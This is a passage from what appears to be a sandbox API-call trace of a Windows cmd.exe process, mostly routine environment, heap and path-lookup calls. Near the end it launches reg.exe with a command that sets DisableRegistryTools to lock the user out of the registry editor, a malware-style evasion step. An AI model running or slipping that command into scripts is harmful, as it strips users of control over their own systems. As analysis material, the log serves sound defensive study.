8 [0276.086] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0276.086] GetProcessHeap () returned 0x4b0000 [0276.086] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b8828) returned 1 [0276.087] GetEnvironmentStringsW () returned 0x4b7e00* [0276.087] GetProcessHeap () returned 0x4b0000 [0276.087] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa32) returned 0x4ba8d0 [0276.087] FreeEnvironmentStringsA (penv="A") returned 1 [0276.087] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0276.087] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.087] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0276.087] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0276.087] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0276.088] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0276.088] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0276.088] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0276.088] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0276.088] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0276.088] GetProcessHeap () returned 0x4b0000 [0276.088] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x44) returned 0x4b05c8 [0276.088] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0276.088] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0276.088] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0276.088] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4b0618 [0276.089] FindClose (in: hFindFile=0x4b0618 | out: hFindFile=0x4b0618) returned 1 [0276.089] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4b0618 [0276.089] FindClose (in: hFindFile=0x4b0618 | out: hFindFile=0x4b0618) returned 1 [0276.089] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0276.089] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4b0618 [0276.090] FindClose (in: hFindFile=0x4b0618 | out: hFindFile=0x4b0618) returned 1 [0276.090] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0276.090] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0276.090] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0276.090] GetProcessHeap () returned 0x4b0000 [0276.090] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4ba8d0) returned 1 [0276.090] GetEnvironmentStringsW () returned 0x4b7e00* [0276.090] GetProcessHeap () returned 0x4b0000 [0276.090] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa76) returned 0x4b9e90 [0276.091] FreeEnvironmentStringsA (penv="=") returned 1 [0276.091] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0276.091] GetProcessHeap () returned 0x4b0000 [0276.091] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b05c8) returned 1 [0276.091] GetProcessHeap () returned 0x4b0000 [0276.091] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400e) returned 0x4bbd90 [0276.092] GetProcessHeap () returned 0x4b0000 [0276.092] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xf4) returned 0x4ba910 [0276.092] GetProcessHeap () returned 0x4b0000 [0276.092] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4bbd90) returned 1 [0276.092] GetConsoleOutputCP () returned 0x1b5 [0276.101] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0276.101] GetUserDefaultLCID () returned 0x409 [0276.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0276.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0276.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0276.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0276.102] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0276.102] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0276.104] GetProcessHeap () returned 0x4b0000 [0276.104] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x20c) returned 0x4baa58 [0276.104] GetConsoleTitleW (in: lpConsoleTitle=0x4baa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0276.113] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0276.113] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0276.113] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0276.113] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0276.113] GetProcessHeap () returned 0x4b0000 [0276.114] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400a) returned 0x4bbd90 [0276.114] GetProcessHeap () returned 0x4b0000 [0276.114] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4bbd90) returned 1 [0276.115] _wcsicmp (_String1="reg", _String2=")") returned 73 [0276.115] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0276.115] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0276.115] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0276.115] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0276.115] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0276.115] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0276.115] GetProcessHeap () returned 0x4b0000 [0276.115] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x58) returned 0x4bac70 [0276.115] GetProcessHeap () returned 0x4b0000 [0276.115] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x10) returned 0x4b0578 [0276.118] GetProcessHeap () returned 0x4b0000 [0276.118] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xea) returned 0x4bacd0 [0276.119] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0276.119] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0276.119] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0276.119] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0276.119] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0276.119] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0276.119] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0276.119] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0276.119] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0276.119] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0276.119] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0276.119] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0276.119] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0276.120] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0276.120] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0276.120] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0276.120] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0276.120] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0276.120] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0276.120] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0276.120] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0276.120] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0276.120] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0276.120] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0276.120] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0276.120] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0276.120] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0276.120] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0276.120] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0276.120] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0276.120] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0276.120] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0276.120] _wcsicmp (_String1="reg", _String2="START") returned -1 [0276.121] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0276.121] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0276.121] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0276.121] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0276.121] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0276.121] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0276.121] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0276.121] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0276.121] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0276.121] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0276.121] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0276.121] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0276.121] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0276.121] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0276.121] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0276.121] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0276.121] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0276.121] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0276.121] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0276.121] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0276.121] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0276.121] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0276.121] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0276.121] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0276.121] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0276.121] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0276.121] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0276.121] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0276.122] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0276.122] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0276.122] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0276.122] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0276.122] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0276.122] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0276.122] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0276.122] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0276.122] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0276.122] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0276.122] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0276.122] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0276.122] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0276.122] _wcsicmp (_String1="reg", _String2="START") returned -1 [0276.122] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0276.122] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0276.122] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0276.122] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0276.122] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0276.122] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0276.122] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0276.122] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0276.122] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0276.122] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0276.122] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0276.122] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0276.122] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0276.123] GetProcessHeap () returned 0x4b0000 [0276.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x210) returned 0x4badc8 [0276.123] GetProcessHeap () returned 0x4b0000 [0276.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xf2) returned 0x4bafe0 [0276.123] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0276.123] GetProcessHeap () returned 0x4b0000 [0276.123] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x418) returned 0x4b05c8 [0276.123] SetErrorMode (uMode=0x0) returned 0x0 [0276.123] SetErrorMode (uMode=0x1) returned 0x0 [0276.123] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0276.123] SetErrorMode (uMode=0x0) returned 0x1 [0276.123] GetProcessHeap () returned 0x4b0000 [0276.123] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4b05c8, Size=0x4c) returned 0x4b05c8 [0276.124] GetProcessHeap () returned 0x4b0000 [0276.124] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4b05c8) returned 0x4c [0276.124] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0276.124] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0276.124] GetProcessHeap () returned 0x4b0000 [0276.124] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x110) returned 0x4bb0e0 [0276.124] GetProcessHeap () returned 0x4b0000 [0276.124] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x218) returned 0x4b0620 [0276.132] GetProcessHeap () returned 0x4b0000 [0276.132] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4b0620, Size=0x112) returned 0x4b0620 [0276.132] GetProcessHeap () returned 0x4b0000 [0276.132] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4b0620) returned 0x112 [0276.132] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0276.132] GetProcessHeap () returned 0x4b0000 [0276.132] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xe0) returned 0x4bb1f8 [0276.135] GetProcessHeap () returned 0x4b0000 [0276.135] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4bb1f8, Size=0x76) returned 0x4bb1f8 [0276.135] GetProcessHeap () returned 0x4b0000 [0276.135] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4bb1f8) returned 0x76 [0276.136] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0276.136] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0276.137] GetLastError () returned 0x2 [0276.137] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0276.137] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x4bb278 [0276.137] GetProcessHeap () returned 0x4b0000 [0276.137] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x14) returned 0x4b7888 [0276.137] FindClose (in: hFindFile=0x4bb278 | out: hFindFile=0x4bb278) returned 1 [0276.137] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0276.138] GetLastError () returned 0x2 [0276.138] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x4bb278 [0276.138] GetProcessHeap () returned 0x4b0000 [0276.138] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4b7888, Size=0x4) returned 0x4b0590 [0276.138] FindClose (in: hFindFile=0x4bb278 | out: hFindFile=0x4bb278) returned 1 [0276.138] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0276.138] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0276.138] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0276.138] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0276.139] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0276.139] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0276.139] GetProcessHeap () returned 0x4b0000 [0276.139] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x4b7888 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0276.140] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0276.140] GetProcessHeap () returned 0x4b0000 [0276.140] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b7888) returned 1 [0276.140] GetProcessHeap () returned 0x4b0000 [0276.140] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa) returned 0x4bb278 [0276.140] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0276.143] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f", lpProcessInformation=0x19f6fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x614, dwThreadId=0xbc8)) returned 1 [0276.622] CloseHandle (hObject=0xa4) returned 1 [0276.622] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0276.622] GetProcessHeap () returned 0x4b0000 [0276.623] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b9e90) returned 1 [0276.623] GetEnvironmentStringsW () returned 0x4b9e90* [0276.623] GetProcessHeap () returned 0x4b0000 [0276.623] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa76) returned 0x4b7e00 [0276.623] FreeEnvironmentStringsA (penv="=") returned 1 [0276.623] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0277.595] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x0) returned 1 [0277.596] CloseHandle (hObject=0xa8) returned 1 [0277.596] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000000") returned 8 [0277.596] SetEnvironmentVariableW (lpName="=ExitCode", 